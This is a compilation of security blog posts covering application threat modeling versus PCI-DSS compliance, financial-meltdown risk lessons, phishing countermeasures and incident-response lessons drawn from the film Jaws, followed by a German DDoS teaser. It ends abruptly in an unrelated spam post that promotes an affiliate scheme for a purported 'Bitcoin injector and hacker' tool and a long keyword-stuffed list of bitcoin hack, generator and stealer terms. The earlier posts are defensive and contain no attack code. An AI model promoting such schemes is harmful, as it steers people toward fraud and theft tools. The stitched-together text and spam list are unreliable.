I recently had the opportunity to give prezos for OWASP in Los Angeles and Orange County together with the Application Threat Modeling book co-author, Tony Ucedavelez. Both Tony and I believe that application threat modeling can help organizations understand cyber-threats and identify countermeasures to mitigate them proactively. We also think that compliance with security standards is not a guarantee for "immunity" of becoming a target and victim of cybercrime and fraud hence the topic of our presentation, intentionally provocative: "The rise of threat analysis and the fall of compliance in mitigating cyber-crime risks". We take a critical view of compliance especially PCI-DSS and we advocate putting compliance in perspective of business risks mitigation. To support our view, we start looking at how PCI-DSS security standard drives application security with compliance to highlight the fact the two largest data breaches of credit card data ever reported occurred to companies that were compliant with the security standard PCI-DSS. We also analyze these data breaches for the business impact that caused and we compare the cost of non-being compliant with the cost of the business impact caused by the breach: based upon public disclosed data (2007 TJX data breach) we find out that overall the cost of non-compliance is one factor less of magnitude comparing with how much will cost to an organization to cover the overall business impact of the data breach incident (e.g. millions for non compliance comparing with billions for business impact)

There is a strong and compelling case, based upon vulnerability data alone, that compliance do not buy security for your organization but a minimum level of information security assurance: in the context of mitigating vulnerabilities for compliance sake for example such as to fill a compliance requirement (e.g. vulnerability assessment), based upon the data from MITRE, at their best the organization will mitigate 45% of all known vulnerabilities (e.g. 600 included in CWE MITRE in the study).

We use this data to advocate that the remaining 55% of ways to exploit known issues can be assessed by adopting a threat analysis and risk mitigation techniques that cover a larger attack space then compliance security assessments. These threat analysis techniques for example include (1) gathering cyber-intelligence from attacks from public sources such as law enforcement (e.g. FBI, Secret Service), (2) learning about attacks scenarios and likely targets with attack tree analysis, (3) determine the possible abuses of the applications business logic using use and abuse cases, (4) identify the attack vectors used against web sites so applications defenses can be tested and (5) finally by developing application countermeasures at the application layer with threat modeling/architecture risk analysis.

The threat mitigation mantras are: (1) you can only mitigate for threat you know of. ( 2) Know your enemy so you can build your defenses. Being threat aware means being threat intelligent. To know your enemy means proactive risk awareness: as organizations defending from cyber-attacks we need to be aware that cyber-criminals already assume your have been compliant with PCI-DSS to mitigate known vulnerabilities such as to protect credit card data.

Fraudsters also know that ogrnaizations implemented multi-factor authentication and fraud detection, in compliance with FFIEC guidelines for authentication.

We basically need to be aware of the new bigger cybercrime threat and how might affect us. For example, cyber criminals can buy or lease sophisticated automated attack tools called botnets to do fraud. These botnets can direct attacks against banking customers by exploiting browser vulnerabilities as well as against on-line banking sites bypassing strong authentication and data filtering controls. Cyber-crimes include fraud (e.g. wire transfer to money mule accounts) as well as stealing credit card and confidential data for reselling it in the underground economy or to fake credit and debit cards.


Understanding how these threats scenarios might affect your organization in terms of threat analysis means: 1) Is possibly my organization a target 2) what is the data asset that most likely an attacker/fraudster will go after 3) the attack vectors) that he will use 4) the potential vulnerabilities that can be exploited and where 5) which are the countermeasures that I can design and deploy at the application layer.

Threat analysis of security controls must be the driver for design of countermeasures:

To test defensive controls at the application layer, we need to identify the attacks vectors (both manual and automated) and use them against the authenticated and non authenticated entry points of our application, validate the authorization levels required and walk-through the data flows (from client to back end) to test for potential vulnerabilities. The aim of this data flow threat analysis is to localize and identify countermeasures can be designed and deployed at each layer and component of the architecture (client, server processes and data).

We emphasize that for security compliance to be security effective, needs to enforce actionable threat assessments. We advocate a new risk mitigation strategy that looks at compliance with a positive security approach rather then negative security approach. The positive security approach consists on proving the positive effect of defenses on mitigating threats, the negative security approach consists on proving the gaps in applying standards and security controls. Positive security is driven by threat analysis as a positive factor for building better security controls against new threats, negative security is driven by compliance as a way to prove the negative that is your organization failed in applying standards and policies.

We conclude that even if there is still a value in compliance for security as validation against a minimum level of security requirements, the approach that most organization use toward compliance does not help security and derails the organization effort from focusing on effective threat risk mitigation. To improve security organizations need to re-consider compliance; being compliant will not warrant protection of your core business assets against cyber-crime threats. Compliance is just a piece of the risk mitigation strategy , compliance security assessments can be effective mitigation against cyber-crime threats only when are driven by cyber-crime intelligence and application threat modeling techniques.

An abstract of the presentation is included herein: On August 5 of 2009, Federal prosecutors charged Albert Gonzales with the largest case of credit and debit card data theft ever occurred in the United States: 130 million credit cards numbers by hacking into Heartland Payment Systems, Hannaford Brothers, 7-Eleven and two unnamed national retailers. Both Heartland and Hannaford were security compliant with PCI-DSS standard at the time they were compromised: that let question the validity of regulatory compliance frameworks, and specifically compliance with PCI-DSS standards as an effective method to reduce data breaches, identity theft, and the proliferation of credit card fraud. This presentation will further analyze the cost of the data breaches by monetizing the losses as being reported in quarterly earning reports (e.g. TJX) as well as impact on stock price (e.g. HPY) at the time of public disclosure of these data breaches. Monetizing data breaches helps to frame non-compliance risks as a factor of business impact and dispelling further the myth that being compliant equals being secure.


Traditional compliance-driven security assessments efforts such as penetration testing, static code analysis and standard compliance gap analysis will be compared to threat analysis techniques in order to demonstrate how cybercrime risks can be mitigated by understanding threat scenarios through cyber-intelligence: cases of reported cybercrime attacks will be presented as a way to determine the threat landscape and the attack scenarios. Attacker motives and means to achieve them will be analyzed by using attack tree analysis: attack trees allow to study cyber attacks against web applications, breaches of credit card data as well as ATM fraud. Use and misuse cases will be used to evaluate the strength of security controls such as multi-factor authentication against known cyber-attacks such as MiTM as well as a way to elicit requirements for security controls (e.g. secure logins). Examples of attack vectors for testing applications against code injection attacks as well as for cybercrime attacks (e.g. HTML-IFRAME Injection Attack Vectors and drive by download) will be provided using attack vector analysis. Data Flow Diagrams (DFD) Analysis and Architecture Risk Analysis examples will be presented to provide a viable, consistent methodology to identify the entry points for attack vectors, identify user access levels, enumerate threats as well as to determine threats, attack, vulnerabilities and countermeasures. Security by deployment and security by design principles will be elaborated as strategic countermeasures with reference to three tier architectures and security by design architecture principles. Finally, risk mitigation strategies against cybercrime attacks will be discussed starting by self-awareness questions. The presentation re-affirms that compliance risks need to be approached by organizations as a factor of business risk and advocate threat risk modeling and application threat modeling as a actionable processes for mitigating cybercrime risks to web applications.
by using threat tree analysis for example it is possible to analyze the effectiveness of security controls such as MFA to mitigate threats such as man in the middle attacks to find out that most of them are ineffective. By identifying the targets of attacks with attack trees we also find that browser vulnerabilities facilitate drive by download, man-in-the-middle and man-in-the-browser attacks and that these vulnerabilities represent the weakest security link. Only after cyber-crime targets are analyzed and visualized with attack trees it is possible to understand the different avenues of attacks methods used by the fraudsters. By associating a cost for achieving each step of the attack tree it is possible to walk through the attack methods that cost the least to an attacker to succeed.
          Financial Markets Meltdown: Risk Management Lessons        
Example of god action: lightning
I just finished reading the book "Against The Gods, The Remarkable Story Of Risk, Peter L. Bernstein". This is part of my current study of financial risks and relationship with information security risks. The book is written by an economist, Peter Bernstein and provides, in my opinion very good insight on how risk analysis evolved as discipline to respond to human needs. Along the course of history, risk management has evolved as discipline to help humans in calculating risks for decision making in different aspects of human condition such as nation's and individual wealth, human health, engineering, warfare etc.

As a technical discipline, risk management also evolved as part of the progress made by mathematicians in predicting risk. Most of us now associate the likelihood factor of risk to a calculation of a probability such as the likelihood that the occurrence of significant events might have impact in our human lives. Risk analysis had a shift in the course of human history with the mathematical discovery of probability theory that originated back in 1,600 Century, thanks mostly to the works of mathematical geniuses such as Pascal and Fermat. These mathematicians were the first to devise a mathematical method to forecast the Pacioli’s puzzle game. From a way to predict the outcomes of games and help gamblers, probability theory evolved in the 1700 century to respond business needs such as by helping the English government to predict life expectancies so they could help the finances with the sale of life annuities. This event marked the start of the Insurance Business. Later Bernoulli and Leibniz invented methods of statistical sampling that are used today in scientific methods for asserting quality, health of populations, demographic and political studies etc etc. We had the discovery of the normal distribution that is used for statistical analysis: events could predicted when the number of observations of the sample increased. In 1800 Century we had the chaos theory and the discovery of critical concepts in statistical analysis such as"the regression from the mean" that explains that events are affected by a random variance so that a market can be expected to fall after going up and viceversa. In the 1900 financial risk theories also demonstrated mathematically that putting all eggs in one basket is unacceptable risk strategy for buying stocks.

Human factors is the
 fundamental risk "element"
In modern times, risk models got help from information technology and computerized risk modeling. These risk models are used to predict financial trends and support decision making. Nevertheless these models also fail. Being risk calculation a complex, multi-variable and non-linear problem to solve, the accuracy of these models is always in question. For example,these computerized models clearly failed to predict the house mortgage risks and the impact on the financial markets. In my opinion this is because risk in essence ties fundamentally to the human element and irrational decision making. It also ties to unpredictable events that we did not include in the analysis of the mathematical model. At the root of the meaning of risk we have to dare, as Bernstein points out, the origin word for risk (sounds like I am paraphrasing the movie, the fat greek wedding :) from the Italian (risicare) that means act, to dare. There is actually a say for it that is a proverb for the one of who that know Italian Language “chi risica non rosica” it means who does not risk do not gain for it…

The point I want to make here is that human factors determine how we react to risk. From this perspective, learning about human history as a factor to make risk decisions is the key for effective risk management

One interesting lesson that can be learn is the "attitude" or the "appetite" for risk was obviously not calculated and lead the financial markets to the current meltdown. During the so called "housing price bubble" era of the last 5-7 years we had people buying houses by borrowing money with mortgages that were at high risk of not being repaid. The home buyers and the financial institutions allowed this party to happen, home owners happy to own houses that according to risk should not have afforded and the financial institutions taking high risks for pure financial gains along with speculators inflating the home values by buying and selling property for their quick profit.

Then things started to change for the worst, rumors spread that some banks were running out of cash and that big institutional investors pulled out from the market. Acting upon "rumors" investors start selling financial stocks. This despite CEOs of such financial institutions are still trying to reassure investors. Rumors eventually become reality, the big investors pull out from the market and all the sudden, financial institutions need to raise capital to keep them afloat. At last resort the government comes to help to contain the impact to the overall economic system.

Co-risk for financial institutions
One lesson that you can learn it that this is a case of systemic risk. Systemic risk are the most dangerous risks because scale up to different entities all interconnected and might end up impacting the all financial system. For example the US financial meltdown started with the failing of financial institutions that depended on each other because they shared the risk: from Bear Sterns to Lehman Brothers, from Merry Lynch to AIG and then to Bank Of America and Citigroup. Most recently, the US Government acted to contain the systemic risk with extraordinary measures and very timely, bailing out financial institutions with enormous amount of money.

From the perspective of information security we might also have similar systemic risks. An example of systemic risk is the impact that a critical information system such as the one that serves as backbone to all infrastructure and operations one day might fail. This can be for example attacks to bring down the Internet such as with denial of service attacks to the root domain servers that serve the DNS protocol. Another example of systemic risk is the one posed by botnet driven distributed denial of service attacks toward financial transaction systems as well as the financial infrastructure. Attacks that potentially pose a systemic risk to the information infrastructure of a country or a company need to be taken very seriously and analyzed using attack trees and threat modeling.

Credit Default Swap:
Source:Invest2success blog
Another lesson that you can learn from the financial market meltdown are the gaps in laws and regulations to control risk. Take for example the unregulated Credit Default Swaps used by banks to make million of dollars with a form of insurance based upon spreading the risk. A CDS meant that you could get insurance on a bond that you owned on the assumption that if the bond did not go “belly up”: you just had to pay the insurance installment and you only needed to repay the all amount of the bond if the bond were going down. This is basically an instrument for risk transfer and risk avoidance that also contributed to increase the systemic risk.

The analogy in information security would be that while your operations expand to new data centers as well as in the value of the data assets you manage, you do not step up in the security controls by investing in security technology, processes as well as people. You might also decide to transfer the risk to another entity and have you services managed by them. In some cases a certification from auditors still lacks clear oversight on the security risks you are facing.

Once you face the impacts of systemic risk you need to act with extraordinary measures to contain the risk and still it takes a lot of time to recover to normal.

Another lesson you can learn from human attitude toward risk is that there is always a Cassandra that is someone that prophetically had made his risk assessment as negative against the common thinking being positive as Cassandra told all the people in Troy to watch out for the Trojan Horse, but nobody paid any attention.. As humans we doubt of "doomers" especially when everybody else is partying..

Unfortunately, one of the greatest lessons from the learning of human perception of risk is that is humans do not usually make decisions based upon previous generation mistakes. For this reason, risk education is fundamental. Risk managers had to learn human sciences and understand human attitude toward risk, the perception of events, which risk indicators are critical and which facts are relevant.

From the perspective of computational models, we should have expected this financial meltdown to happen sooner or later because of a drop of the home prices of 10-20% and other factors could have been built into the model. Besides some indicators of systemic risk such as CDSs could have issued a warning from distribution of risk and business impact perspective:the financial institution inter-dependency and reliance on risk transfer with unregulated transactions should have raised some economist eyebrows.. did risk model factor these elements in their risk model? This questions are still open in my mind.


December 1941 Dec,
Japanese attack US Navy at Pearl Harbor:
A small boat rescues a seaman from
 the 31,800 ton USS West Virginia
 burning in the foreground.

From the information security perspective, we do not have such sophisticated risk models, rather risk assessment is still mostly done as qualitative assessment by risk analysts that understand the business impact of system vulnerabilities. Nevertheless, the equivalent of a meltdown of the Internet cannot be excluded. Some referred to this threat as the digital Pearl Harbor referring to the Pearl Harbor Japanese attack in WWII. We had recently incidents that seems to indicate that such attacks might be possible in the future. We had for example a distributed denial of service attack to the information infrastructure of an entire country such as Estonia, allegedly caused by the Russian Business Network. We proved that cyber attacks to the SCADA power grid are possible as well as distributed denial of service attacks via botnets directed toward financial institutions. Recent examples include coordinated attacks toward ATMs with cloned cards causing RBS 9 ML $ of fraud in one day. The recent credit card information leak involves credit card account information for 100 million users and involves 500+ institutions(Heartland Data Breach).

These kind of systemic attacks require governments and financial institutions to work together to build defenses for preventing potential large scale information systemic risks. There is a need for threat analysis of cybercrime attacks and a reconsideration of what is system critical and what is acceptable risk. Risk mitigation provisions need to be the topic of research and new information security technologies need to be developed to mitigate these kind of attacks. Information security managers need to learn the lessons that the financial risks meltdown posed to the financial markets, how could have been predicted and find the analogies with information risks so a similar systemic risk to the information infrastructure can be prevented.

          New phishing attacks require adoption of different countermeasures        
Phishign warning source:
Cyberpunk blog
Back in the early 2000 phishing attacks require fraudsters to clone a web site, register it on similar domain and social engineer a victim with a phishing mail. Then phishers got smarter: instead to clone the site with CGI and do all this work why not use a web proxy and exploit a man in the middle attack? Besides this is also a good way to break multi factor authentication controls!. This was back in 2006. Since then, most banks and financial institutions in US deployed strong authentication, besides to mitigate phishing also in response to FFIEC compliance on authentication guidelines. Since then, phishing attacks have evolved to exploit man in the browser vulnerabilities, inject code that can executed by the browser and exploit web site XSS vulnerabilites. In the last years, phishing resort to the use of botnets to be more even more effective such as Mpack, Storm, Asprox and RockPhish just to mention the more popular. These are the tools for the cybercrime economy built to be used by professional fraudsters to gain million of $$ not script kiddies looking for fame! The cost pf such botents in the thousands of $$ and the sale of them generates a business of millions of $$ for the underground economy. The sophistication of these botnets is that can be very stealth to IDS and difficult to tear down by IP because of use of fast flux techniques such as round robin DNS with a short TTL constantly changing the IP mapped to a domain. More information on fast flux and how is used in botnets such as ASPROX can be found here. Spear (targeted) phishing is currently a target for banks: the tools are very close to the original site and use Rockphish as a botnet. This threat is real and requires new countermeasures. It means first of all raise the bar and reduce the attack surface. For example, consider more security for the users of your web site, require them to use locked down browsers with anti-phishing plug-ins enabled with extended validation certificate support. A sandboxed browser such as the ones provided by Trusteer and Authentium could mitigate the risk of malware and keyloggers downloaded on the client browser when your customers become victims of botnet attacks. On the application side, increase defenses by using strong authentication and out of band delivery of tokens to mitigate MiTM attacks: for example using one time passwords and tokens that are delivered completely via SMS and other channels. As a bare minimum, you need to mitigate web application vulnerabilities that can be exploited to attack the browser in a phishing attack such as OWASP T10. In particular XSS and XFS vulnerabilities can be exploited for phishing to deliver attack vectors for malware and spyware. Session management flaws such as CSRF (or session riding) can also be used for phishing. Often times, your site might have design flaws exploitable with targeted attacks that exploit information disclosure, authorization and authentication vulnerabilities. For example an attacker can try to harvest/enumerate user credentials, bank account and credit card information to use to commit fraud via different channels. When you become a victim of botnet attacks, your capability to profile the attacks and alert on the intrusions is very critical for risk mitigation: an IDS that is build into the web application such as OWASP ESAPI or in the web server such as a WAF (Web Application Firewall) can log and monitor suspicious activity and trigger alerts for potential fraud attempts. Using honeypots to learn about botnet attacks can be very useful as well as to learn how to build in defenses. Threat analysis and modeling is the key for mitigation: attack trees can be used to identify possible attack scenarios, the channels being used and the vulnerabilities that can be exploited. Take the attack tree as reference to derive the right countermeasures for the most likely attack scenarios such as the ones that the frauster might use because of the path of minimum resistance and effort. For example, considers that credit card and account data can be purchased from cyber criminal organizations selling their services on line. If such attack is cheaper than to break authentication probably that's the one that a frauster will go after first. If your site has easily exploitable information disclosure vulnerabilities probably the fraudster will attack your site first instead. The most important criteria: never assume the adoption of a anti phishing security technology will solve your problem. You need to consider different mitigations wisely and a defense in depth strategy. Be proative: consider that when you rely on the law enforcement to drive countermeasures is a little too late and this can be very painful in terms of financial losses. Before your site becomes a victim of fraud with phishing 2.0, do a thoughtful review of potential threat scenarios for all your service delivery channels for example both web, ATMs, IVRs and other delivery channels you might have. You need to consider these channels as the attack surface available to a fraudster, simulate potential botnet based/phishing attack scenarios and validate the effectiveness of countermeasures.

          7 Information Security Lessons You Can Learn By Watching The Movie JAWS        
If your are an information security officer managing risk and incident response processes, I strongly recommend watching the movie Jaws as a case study for learning how human and business factors play in dealing with bad, non expected and non foreseeable negative events, such as in this case, shark attacks, and how risk mitigation decisions are affected by human psychology. The move is a en example on how the human psyche responds to  negative events through stages such as: (1) denial, (2) awareness, (3) responsibility, (4) action. I am not a psychologist but this is my interpretation by just applying common sense: Denial comes from the fact that till we (as people or as business) are not impacted directly by the consequences of a negative event, we most likely minimize risks. Awareness, is driven by the fact that we had experienced a negative impact such as a damage or a financial/asset loss before and so we raised our level of attention as a response to feelings (fear). Responsibility, comes from a feeling of duty or role to deal with the risk and the negative consequences of it, for example, as humans, we might feel responsible to react to protect business, family, friends that depend upon us, our actions and our role in society. The last stage of incident/risk response process is the call for Action.  This it is either triggered by need to prevent further sure loss and damage or because someone else told us to do so. If you watch the movie from this perspective, as a case study for managing the risk of security incidents such as data losses and fraud, you can see clearly all these elements and learn some lessons for dealing with security incidents:
Lesson #1: The first approach toward risk, when not impacting directly a business or an individual, is to either ignore it or minimize it. For example, the movie is about the risk of being killed by a shark attack. In the opening scene of the movie, a shark is seen wandering in the ocean and killing a girl during a skin-dipping swim after a college party. The police, that responded to the incident, finds the remains of the body and needs to file a report. The human remains are a clear indication of a shark attack but the policeman filing the report of the incident is advised to minimize the incident for fear that reporting the incident would have scared off the tourists to come to the town beaches on vacation. How this lesson applies to IS risk? A company had a security incident and customer data was compromised as a result. The attack indicates that an attacker got customer data by breaking into the database through one of the company web sites. The business together with security and fraud decides to file a security incident report that the web site application database that stores customer information has been compromised but minimizes the potential impact since no customer PII (Personal Identifiable Information) has been compromised. The decision is to investigate this further till more information is gathered.

Lesson #2: When the causes of the incident are not found and the fix does not address the root cause, more incidents most likely will occur and get noticed. Since the shark is still alive, it attacks again and makes another victim. At this point, the incident cannot be ignored since it happens in complete daylight with a lot of witnesses. In the mean time, another shark (but not the killer one) is being caught and shown to the public as proof that now the shark responsible for the attacks has been caught and beaches are no-longer at risk. How this applies to IS risk? The company did not found the cause of the exploit/data breach so they had another cyber-attack that exposed customers data to public. Since now the information about the data loss and the vulnerability is public, the company needs to do something to deal with the damaged reputation. The company then decides to release information to the public that no compromise of personal identifiable information was result of the incident and  publicly disclosed that the vulnerability has now been fixed and there is no risk for the customers.

Lesson #3: When new, internally adopted measures do not mitigate the risk of further incidents, you most likely ask for help from the outside, such as by a security matter expert/consulting company. The policeman of the city where the shark attack takes place asks a researcher of the US Oceanic Institute for help on dealing with the shark killing threats. The researcher comes to the town and starts his investigation, he soon realizes that this is a case of a giant tiger type of a shark attack and that the shark that was believed to be the killing one (the shown to public as trophy) is not possible to be the one that made such killings since the teeth of the jaw of the shark and the teeth marks in the scares of the victims did not match. The researcher explains the results of his analysis to the police and the town officials and recommends a call for action for killing the tiger shark. After meeting with the policemen and the major it still decided not to. How applies to IS risk? The company internal security team has identified some security vulnerabilities like SQL injection that possibly were the cause of the breach, these were fixed but the attacks continued to occur so a security consulting company is asked to analyze this further. Security researchers did some security tests (e.g pen tests, vulnerability scans) and concluded that even if some of the identified vulnerabilities can be exploited for the type of the attacks seen like SQL injection, other potential critical security flaws (e.g. weak authorization controls, weak input validation) can be exploitable too but these security flaws might actually require to do a design review to be identified and eventually require to re-engineer the application security controls. The business is still undecided to whether pursuit these recommendations since require more explanation of risk and impact to justify very expensive design changes to the application.

Lesson #4: When the impacts of incidents gets bigger and get notified to senior officials, can be ignored no more and it is decided to act. The shark attacks again and this time even more deadly, the people are now scared and demand prompt action to the major of the city and the policeman to kill the shark. After the major of the city and the police hears the people complains at a public hearing, they decide to finance a mission to kill the tiger shark. How applies to IS risk? Fraudsters break again to the site and this time the financial and reputation losses can no longer be ignored including senior management at the company that now decides to prioritize the effort to mitigate this risk and put resources and spend money to identify the root causes of these attacks and provide risk mitigation solutions.

Lesson #5: The first approach to deal with attacks takes the defensive perspective to detect the negative events and pinpoint the threat sources. The policemen, the shark hunters/fisherman and the Oceanic Society Shark researcher devise different techniques to locate the shark attacks such as by hooking floating detection devices to the fisherman boat, these "sensors" seem to work, for a moment, the killing shark is located and traced and seems to be within reach for a shot. How applies to IS risk? The company installs new Security Incident Event Monitoring (SIEM) and starts to closely monitor the attacks looking at logs and incident events. Once an alert from the SIEM is triggered, it is decided to block the IP address of the most likely source.

Lesson #6: If your deal only with the symptoms instead of the root causes of an incident, the countermeasures can be bypassed by the attacker and the risk is still not mitigated. Despite all the effort put forth to detect the killing shark attacks, the shark outsmarts the fishermen, the oceanographer and the policeman by breaking the hooks where the floating devices where attached and attacks the boat unnoticed. The shark now attacks the boat directly, breaks it and causing it to sink. How this applies to IS incidents? The fraudster learned that incident-event evasion techniques can be used against the application, a SIEM event that pinpoints the source of the IP address to block the traffic, it does not stop the attack since the attacker uses proxies and fast-flux botnet techniques where the source IP is dynamically changed in real time.

Lesson #7: By tackling the causes of the incidents and the sources of the attacks finally the risk of further attacks is mitigated.  The fishermen are now actively engaged in fighting back the shark attacks, during a dramatic wrestling with the shark, the policemen throws the boat gas tank on the shark jaw and then aim to it with a rifle causing the gas tank to explode. How applies to IS risk? After an analysis of the attack scenarios several most probable attack patterns are simulated, the attack surface of the application is identified as well as the possible data entry points for intrusion. The data entry point that is most likely used by the attacker is a web form to initiate a database query transactions to gather customer's demographic information, access to this data entry form and the transaction are temporarily disabled by configuration changes and this prevents the attack to occur. The application logs collected during the attacks are provided to law enforcement. These along with other information collected by the law enforcement, such as the attacker's toolkit/scripts used in the attack, provide enough information to pin point the attacker, take down the IP address and eventually catch the fraudster with a sting operation. Further  security design review of the application identified flaws in the implementation of the transaction for query demographic customer data such as elevation of user privilege through changes of query parameters that were unvalidated by the server. Application design changes are implemented to prevent further attacks such as to strictly enforce role base access controls on the server side with new policy rules, changes to the web form not pass role/permissions parameters in the query. These fixes were implemented with a new patch and access to these transactions was re-enabled for the customers. Finally a disclaimer, the examples mentioned herein are not factual..

          Linksys und Persirai – die aktuelle DDoS-Lage von IoT        

Online-Marktplätze, bekannte Telefon- und DNS-Dienste: Sie alle standen in letzter Zeit unter DDoS-Beschuss. Die durchgeführten Attacken erfolgten dabei über IoT-Botnetze. Wie reagieren Hersteller, Internetnutzer und Regierungen darauf?     Immer noch große Sicherheitslücken in IoT-Geräten Vor wenigen Wochen spürte der amerikanische Hardware-Hersteller Linksys Sicherheitslücken in mehreren Router-Modellen der WRT- und der EAxxx-Serie auf. Über diese […]

Der Beitrag Linksys und Persirai – die aktuelle DDoS-Lage von IoT erschien zuerst auf Myra.


          Earn 10$ Per Sale In Your Bitcoin Account With Proof        
I recently start to promote an unknown product for unknown person. The name of this product is Bitcoin injector and hacker. I don't know about the product whether it really works or not and I did not tried it out to steal bitcoin but instead I start to promote this product and I got 50$ in my blockchain account in a few days. The Price of the software is 20$ when someone buy this product through your affiliate link then 10$ will go to the owner bitcoin account and 10$ will go the the promoter bitcoin account.

For more information and payment proofs
click here

==========================================================
777 bitcoin bot 999dice bitcoin bot best bitcoin bot bitcoin 2048 bot bitcoin 2048 bot 2015 bitcoin 999 bot bitcoin aliens bot bitcoin arbitrage bot bitcoin arbitrage bot open source bitcoin arbitrage bot python bitcoin arbitrage bot reviews bitcoin auto bot bitcoin autosurf bot bitcoin betting bot bitcoin billionaire bot bitcoin bot bitcoin bot - get coin with captcha bitcoin bot 0.4 alpha bitcoin bot 2014 bitcoin bot 2015 bitcoin bot 2017 bitcoin bot algorithm bitcoin bot android bitcoin bot api bitcoin bot apk bitcoin bot app bitcoin bot btc-e bitcoin bot builder bitcoin bot c# bitcoin bot captchabitcoin bot csgo bitcoin bot download bitcoin bot earn bitcoin bot ema bitcoin bot faucet bitcoin bot faucet 2017 bitcoin bot firefox bitcoin bot for android bitcoin bot for mac bitcoin bot forum bitcoin bot free bitcoin bot free download bitcoin bot freebitco.in bitcoin bot generator bitcoin bot genetic bitcoin bot github bitcoin bot gratis bitcoin bot gt bitcoin bot hacking bitcoin bot hacking software bitcoin bot imacros bitcoin bot linux bitcoin bot mac bitcoin bot miner bitcoin bot mining bitcoin bot mtgox bitcoin bot network bitcoin bot no survey bitcoin bot node bitcoin bot open source bitcoin bot php bitcoin bot profit bitcoin bot python bitcoin bot reddit bitcoin bot review bitcoin bot script bitcoin bot silent miner bitcoin bot software bitcoin bot source code bitcoin bot strategy bitcoin bot telegram bitcoin bot thebotnet bitcoin bot theory bitcoin bot trader bitcoin bot trading bitcoin bot trading free bitcoin bot trading strategy bitcoin bot tumblr bitcoin bot tutorial bitcoin bot uk bitcoin bot ultima bitcoin bot ultima v5.0.1 bitcoin bot ultima v5.0.5 bitcoin bot v 1.07 bitcoin bot v 1.09 bitcoin bot v2 bitcoin bot version 0.4 alpha bitcoin bot virus bitcoin bot wallet bitcoin botnet bitcoin botswana bitcoin buying bot bitcoin casino bot bitcoin cloud bot bitcoin collector bot bitcoin dice bot bitcoin exchange bot bitcoin exchange bot blackhat bitcoin exchange bot download bitcoin exchange bot michael x bitcoin exchange bot review bitcoin exchange bot warrior forum bitcoin faucet bot 2014 bitcoin faucet bot 2015 bitcoin faucet bot captcha bitcoin faucet bot download bitcoin faucet bot hackforums bitcoin faucet bot list bitcoin faucet bot v1.1 bitcoin faucet bot v1.3 bitcoin gambling bot bitcoin game bot bitcoin get bot bitcoin hft bot bitcoin irc bot bitcoin lottery bot bitcoin macd bot bitcoin market bot bitcoin martingale bot bitcoin minefield bot bitcoin mining bot hackforums bitcoin mining bot source code bitcoin online bot bitcoin plus bot bitcoin poker bot bitcoin referral bot bitcoin rolling bot bitcoin roulette bot bitcoin scalping bot bitcoin simple trade bot haasonline bitcoin stealer bot bitcoin stop loss bot bitcoin surf bot bitcoin trading bot bitcointalk bitcoin trading bot bitstamp bitcoin trading bot btc-e bitcoin trading bot chrome bitcoin trading bot code bitcoin trading bot download bitcoin trading bot java bitcoin trading bot kraken bitcoin trading bot open source bitcoin trading bot php bitcoin trading bot profit bitcoin trading bot review bitcoin trading bot windows bitcoin visitor bot bitcoin willy bot bitcoin zebra bot bitcoin-rolling-bot-php bitcoin.b-bot.ru отзывы bitcoin.bot.gt.v1.3 bitcoin.bot.neo.v2.2 bitcoin.in bot bot untuk bitcoin build a bitcoin botnet create a bitcoin botnet daily bitcoin bot earn bitcoin with bot free bitcoin bot 2014 free bitcoin bot 2015 free bitcoin bot download free bitcoin.in bot gekko bitcoin bot review get bitcoin exchange bot haas bitcoin bot how to make a bitcoin bot is bitcoin a botnet make a bitcoin botnet michael x bitcoin exchange bot primedice bitcoin bot weekend bitcoin bot what is a bitcoin bot what is bitcoin botswana zho bitcoin bot v2 биткоин бbitcoin bot bitcoin trading bot trade bot cs go trade cs go trade bot bitcoin robot automated bitcoin trading bitcoin arbitrage bitcoin automated trading bot trade bitcoin faucet bot bitcoin trading robot free bitcoin bot robot bitcoin cryptocurrency trading bot csgo trade bitcoin mining bot bitcoin trading buy bitcoins buy bitcoin instantly bitcoin india bitcoin arbitrage bot btc bot bitcoin bot free buy bitcoinот bitcoin bot wallet bitcoin generator hack 2017 bitcoin generator hack apk bitcoin generator hack review bitcoin generator hack apk 2017 bitcoin generator hack tool bitcoin generator hack 2016 bitcoin generator hack android bitcoin generator hack tool 2017 bitcoin generator hack download bitcoin generabitcoin generator hack apk 2017 bitcoin miner hacked apktor hack tool 2017 bitcoin tbotrading cyber bullying what is cyberbullying cyber bullying facts cyberbully stop cyber bullying cyberbullying facts online bullying social bullying facts about cyberbullying cyber bullying websites cyberbullying information how to stop cyber bullying anti cyber bullying how to prevent cyber bullying internet bullying effects of cyberbullying cyberbullying laws information about cyber bullying facts on cyberbullying cyber bullying for kids bullying online about cyber bullying information on cyberbullying bullying and cyberbullying bitcoin generator online no survey bitcoin generator online no survey 2016 free bitcoin generator online no survey bitcoin generator no survey free bitcoin generator no survey no password free bitcoin generator no survey no password 2017 free bitcoin generator online no survey bitcoin generator free download no survey bitcoin generator 2017 download bitcoin generator no survey no password bitcoin generator no survey 2017 free bitcoin generator no survey bitcoin generator download no survey bitcoin generator hack no survey bitcoin generator online no survey bitcoin generator 2014 no survey free online bitcoin generator no survey bitcoin generator free download no survey bitcoin generator 2017 free bitcoin generator 2017 beta bitcoin generator 2017 online bitcoin generator 2017 apk bitcoin generator 2017.exe bitcoin maker software free download bitcoin mining softwar bitcoin generator software free ultimate free bitcoin generator software bitcoin generator free download bitcoin generator free download 2015 bitcoin generator free download no survey bitcoin generator hack tool free download bitcoin generator hack tool 2bitcoin generator software 2017 bitcoin generator software download bitcoin generator software free download bitcoin generator software free bitcoin generator software 2017 download bitcoin generator software for android bitcoin generator software 2017 free download bitcoin maker software bitcoin software generate coins016 bitcoin generator hack tool free download free bitcoin generator hack tool v2.0 free bitcoin generator hack tool v3.0 free bitcoin generator hack tool bitcoin generator tool 2017 bitcoin generator tool review bitcoin generator tool maker bitcoin generator tool legit bitcoin generator tool v2.0 bitcoin generator tool free bitcoin generator tool v1.22.5 bitcoin generator tool apk bitcoin generator tool v1.0 bitcoin generator hack tool.exe bitcoin generator hack tool v3.0 bitcoin generator hack tool v2.0 download bitcoin generator hack tool android bitcoin generator hack tool download bitcoin generator hack free download bitcoin generator hack tool free download bitcoin generator hack tool v2.0 download bitcoin generator hack bitcoin generator tool bitcoin generator software bitcoin generator hack 2017 bitcoin generator apk bitcoin generator 2017 bitcoin generator no survey bitcoin generator v4.5 bitcoin generator hack apk bitcoin generator hack bitcoin generator tool bitcoin generator software bitcoin generator hack 2017 bitcoin generator apk bitcoin generator 2017 bitcoin generator no survey bitcoin generator v4.5 bitcoin generator hack apk hack bitcoin wallet hack bitcoin address hack bitcoin generator hack bitcoin atm hack bitcoin android hack bitcoin faucet 